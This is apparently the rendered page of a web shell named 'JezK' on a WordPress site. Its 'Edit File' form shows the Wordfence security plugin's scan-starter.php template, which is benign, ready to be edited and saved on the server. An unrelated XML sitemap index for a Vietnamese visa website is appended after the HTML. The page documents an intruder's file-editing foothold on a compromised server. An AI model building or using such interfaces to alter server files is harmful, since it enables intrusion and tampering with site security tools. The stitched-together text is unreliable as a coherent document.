
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: scan-starter.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
if (!defined('WORDFENCE_VERSION')) { exit; }
/**
 * Presents a block list element specifically for the start scan button.
 *
 * Expects $running.
 *
 * @var bool $running Whether or not the scan is currently running.
 */
?&gt;
&lt;div id=&quot;wf-scan-starter&quot; class=&quot;wf-block-navigation-option&quot;&gt;
	&lt;div class=&quot;wf-block-navigation-option-content&quot;&gt;
		&lt;a href=&quot;#&quot; class=&quot;wf-btn wf-btn-primary wf-btn-callout-subtle wf-scan-starter-idle&quot; style=&quot;&lt;?php if ($running) { echo 'display: none;'; } ?&gt;&quot; role=&quot;button&quot;&gt;&lt;?php esc_html_e('Start New Scan', 'wordfence'); ?&gt;&lt;/a&gt;
		&lt;a href=&quot;#&quot; class=&quot;wf-btn wf-btn-primary wf-btn-callout-subtle wf-scan-starter-running&quot; style=&quot;&lt;?php if (!$running) { echo 'display: none;'; } ?&gt;;&quot; role=&quot;button&quot;&gt;&lt;?php esc_html_e('Stop Scan', 'wordfence'); ?&gt;&lt;/a&gt; 
	&lt;/div&gt;
&lt;/div&gt;
&lt;script type=&quot;application/javascript&quot;&gt;
	(function($) {
		$('#wf-scan-starter a').on('click', function(e) {
			e.preventDefault();
			e.stopPropagation();

			if ($(this).hasClass('wf-scan-starter-idle')) {
				WFAD.startScan();
				$('#wf-scan-running-bar').show();
			}
			else {
				WFAD.killScan(function(success) {
					WFAD.colorboxModal((WFAD.isSmallScreen ? '300px' : '400px'), success ? '&lt;?php esc_attr_e('Scan Stopping', 'wordfence'); ?&gt;' : '&lt;?php esc_attr_e('Stop Failed', 'wordfence'); ?&gt;', success ? '&lt;?php esc_attr_e('A termination request has been sent to stop any running scans.', 'wordfence'); ?&gt;' : '&lt;?php esc_attr_e('We failed to send a termination request.', 'wordfence'); ?&gt;');
				});
				$('#wf-scan-running-bar').hide();
			}
		});
		
		$(window).on('wfScanUpdateButtons', function() {
			if (WFAD.scanRunning) {
				$('.wf-scan-starter-idle').hide();
				$('.wf-scan-starter-running').show();
			}
			else {
				$('.wf-scan-starter-idle').show().toggleClass('wf-disabled', WFAD.scanStalled);
				$('.wf-scan-starter-running').hide();
			}
		})
	})(jQuery);
&lt;/script&gt;</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//visaglobal.com.vn/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://visaglobal.com.vn/post-sitemap1.xml</loc>
		<lastmod>2026-08-28T06:51:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/post-sitemap2.xml</loc>
		<lastmod>2026-08-27T04:35:16+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/post-sitemap3.xml</loc>
		<lastmod>2026-08-27T04:24:40+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/page-sitemap.xml</loc>
		<lastmod>2026-08-26T09:38:50+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/category-sitemap.xml</loc>
		<lastmod>2026-08-28T06:51:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/video-sitemap.xml</loc>
		<lastmod>2026-08-26T09:38:50+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->